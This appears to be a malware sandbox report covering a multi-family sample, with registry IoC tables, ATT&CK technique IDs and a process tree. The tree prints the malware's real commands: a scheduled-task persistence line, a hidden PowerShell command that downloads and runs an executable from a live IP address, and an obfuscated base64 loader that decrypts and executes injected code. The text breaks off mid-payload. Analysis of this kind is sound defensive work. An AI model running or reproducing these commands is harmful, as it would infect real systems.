Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bafa6cb643.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f43444a477.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	23c170f0c6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	25c18530d2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	f3cca57da9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bb3887a024.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	272.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	272.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	f3cca57da9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	48a26aad3a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
5800	timeout.exe
1248	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
3364	taskkill.exe
1324	taskkill.exe
5676	taskkill.exe
4776	taskkill.exe
1868	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings	firefox.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3856	schtasks.exe
848	schtasks.exe
1792	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
948	powershell.exe
2996	ahcgjm.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4364	powershell.exe
4364	powershell.exe
1088	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
1088	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
5584	rapes.exe
5584	rapes.exe
948	powershell.exe
948	powershell.exe
948	powershell.exe
5712	rapes.exe
5712	rapes.exe
3300	powershell.exe
3300	powershell.exe
3300	powershell.exe
4124	powershell.exe
4124	powershell.exe
4124	powershell.exe
5036	powershell.exe
5036	powershell.exe
5036	powershell.exe
2512	MSBuild.exe
2512	MSBuild.exe
5960	powershell.exe
5960	powershell.exe
5960	powershell.exe
5264	powershell.exe
5264	powershell.exe
5264	powershell.exe
3292	powershell.exe
3292	powershell.exe
3292	powershell.exe
5716	powershell.exe
5716	powershell.exe
5716	powershell.exe
4548	f7e9929970.exe
4548	f7e9929970.exe
4996	powershell.exe
4996	powershell.exe
4996	powershell.exe
3708	rapes.exe
3708	rapes.exe
5668	TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE
5668	TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE
2000	bafa6cb643.exe
2000	bafa6cb643.exe
2000	bafa6cb643.exe
2000	bafa6cb643.exe
2000	bafa6cb643.exe
2000	bafa6cb643.exe
5884	f43444a477.exe
5884	f43444a477.exe
5884	f43444a477.exe
5884	f43444a477.exe
5884	f43444a477.exe
5884	f43444a477.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
432	powershell.exe
432	powershell.exe
432	powershell.exe
1792	powershell.exe
1792	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
3128	UZPt0hR.exe
3128	UZPt0hR.exe
3128	UZPt0hR.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	3300	powershell.exe
Token: SeDebugPrivilege	2512	MSBuild.exe
Token: SeDebugPrivilege	4124	powershell.exe
Token: SeDebugPrivilege	5036	powershell.exe
Token: SeDebugPrivilege	2512	MSBuild.exe
Token: SeDebugPrivilege	2996	ahcgjm.exe
Token: SeDebugPrivilege	5960	powershell.exe
Token: SeDebugPrivilege	5264	powershell.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeDebugPrivilege	5716	powershell.exe
Token: SeDebugPrivilege	2996	ahcgjm.exe
Token: SeDebugPrivilege	4968	$77Steam.exe
Token: SeDebugPrivilege	5044	ZSoeRVBe.exe
Token: SeDebugPrivilege	4996	powershell.exe
Token: SeDebugPrivilege	4624	$77Steam.exe
Token: SeDebugPrivilege	1868	taskkill.exe
Token: SeDebugPrivilege	3364	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	5676	taskkill.exe
Token: SeDebugPrivilege	4776	taskkill.exe
Token: SeDebugPrivilege	5408	firefox.exe
Token: SeDebugPrivilege	5408	firefox.exe
Token: SeDebugPrivilege	1588	MSBuild.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	1588	MSBuild.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	4508	$77Steam.exe
Token: SeDebugPrivilege	12984	powershell.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
228	bb3887a024.exe
228	bb3887a024.exe
228	bb3887a024.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5408	firefox.exe
5748	f3cca57da9.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5748	f3cca57da9.exe
5408	firefox.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe

Suspicious use of SendNotifyMessage 29 IoCs

pid	Process
1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
228	bb3887a024.exe
228	bb3887a024.exe
228	bb3887a024.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5408	firefox.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe
5748	f3cca57da9.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2512	MSBuild.exe
5408	firefox.exe
1588	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1112 wrote to memory of 6024	1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1112 wrote to memory of 6024	1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1112 wrote to memory of 6024	1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 1112 wrote to memory of 5652	1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 1112 wrote to memory of 5652	1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 1112 wrote to memory of 5652	1112	2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 6024 wrote to memory of 3856	6024	cmd.exe	91
PID 6024 wrote to memory of 3856	6024	cmd.exe	91
PID 6024 wrote to memory of 3856	6024	cmd.exe	91
PID 5652 wrote to memory of 4364	5652	mshta.exe	92
PID 5652 wrote to memory of 4364	5652	mshta.exe	92
PID 5652 wrote to memory of 4364	5652	mshta.exe	92
PID 4364 wrote to memory of 1088	4364	powershell.exe	97
PID 4364 wrote to memory of 1088	4364	powershell.exe	97
PID 4364 wrote to memory of 1088	4364	powershell.exe	97
PID 1088 wrote to memory of 5584	1088	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE	98
PID 1088 wrote to memory of 5584	1088	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE	98
PID 1088 wrote to memory of 5584	1088	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE	98
PID 5584 wrote to memory of 3908	5584	rapes.exe	106
PID 5584 wrote to memory of 3908	5584	rapes.exe	106
PID 5584 wrote to memory of 3908	5584	rapes.exe	106
PID 3908 wrote to memory of 6104	3908	cmd.exe	108
PID 3908 wrote to memory of 6104	3908	cmd.exe	108
PID 3908 wrote to memory of 6104	3908	cmd.exe	108
PID 6104 wrote to memory of 948	6104	cmd.exe	110
PID 6104 wrote to memory of 948	6104	cmd.exe	110
PID 6104 wrote to memory of 948	6104	cmd.exe	110
PID 948 wrote to memory of 3300	948	powershell.exe	114
PID 948 wrote to memory of 3300	948	powershell.exe	114
PID 948 wrote to memory of 3300	948	powershell.exe	114
PID 5584 wrote to memory of 4664	5584	rapes.exe	118
PID 5584 wrote to memory of 4664	5584	rapes.exe	118
PID 5584 wrote to memory of 4664	5584	rapes.exe	118
PID 4664 wrote to memory of 4660	4664	amnew.exe	119
PID 4664 wrote to memory of 4660	4664	amnew.exe	119
PID 4664 wrote to memory of 4660	4664	amnew.exe	119
PID 5584 wrote to memory of 3136	5584	rapes.exe	124
PID 5584 wrote to memory of 3136	5584	rapes.exe	124
PID 3136 wrote to memory of 2512	3136	Lkp52R3.exe	125
PID 3136 wrote to memory of 2512	3136	Lkp52R3.exe	125
PID 3136 wrote to memory of 2512	3136	Lkp52R3.exe	125
PID 3136 wrote to memory of 2512	3136	Lkp52R3.exe	125
PID 3136 wrote to memory of 2512	3136	Lkp52R3.exe	125
PID 3136 wrote to memory of 2512	3136	Lkp52R3.exe	125
PID 3136 wrote to memory of 2512	3136	Lkp52R3.exe	125
PID 3136 wrote to memory of 2512	3136	Lkp52R3.exe	125
PID 2512 wrote to memory of 4124	2512	MSBuild.exe	127
PID 2512 wrote to memory of 4124	2512	MSBuild.exe	127
PID 2512 wrote to memory of 4124	2512	MSBuild.exe	127
PID 2512 wrote to memory of 5036	2512	MSBuild.exe	129
PID 2512 wrote to memory of 5036	2512	MSBuild.exe	129
PID 2512 wrote to memory of 5036	2512	MSBuild.exe	129
PID 2512 wrote to memory of 2996	2512	MSBuild.exe	131
PID 2512 wrote to memory of 2996	2512	MSBuild.exe	131
PID 2512 wrote to memory of 2712	2512	MSBuild.exe	132
PID 2512 wrote to memory of 2712	2512	MSBuild.exe	132
PID 2512 wrote to memory of 2712	2512	MSBuild.exe	132
PID 2712 wrote to memory of 5800	2712	cmd.exe	134
PID 2712 wrote to memory of 5800	2712	cmd.exe	134
PID 2712 wrote to memory of 5800	2712	cmd.exe	134
PID 2996 wrote to memory of 5960	2996	ahcgjm.exe	135
PID 2996 wrote to memory of 5960	2996	ahcgjm.exe	135
PID 2996 wrote to memory of 5264	2996	ahcgjm.exe	137
PID 2996 wrote to memory of 5264	2996	ahcgjm.exe	137

System policy modification 1 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\policies\system	ahcgjm.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	ahcgjm.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn flkHjmaZf9f /tr "mshta C:\Users\Admin\AppData\Local\Temp\H2BJ1kxe1.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:6024
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn flkHjmaZf9f /tr "mshta C:\Users\Admin\AppData\Local\Temp\H2BJ1kxe1.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3856
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\H2BJ1kxe1.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5652
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4364
  - - C:\Users\Admin\AppData\Local\Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
      "C:\Users\Admin\AppData\Local\Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1088
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5584
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3908
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10464271121\ccosvAs.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:6104
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20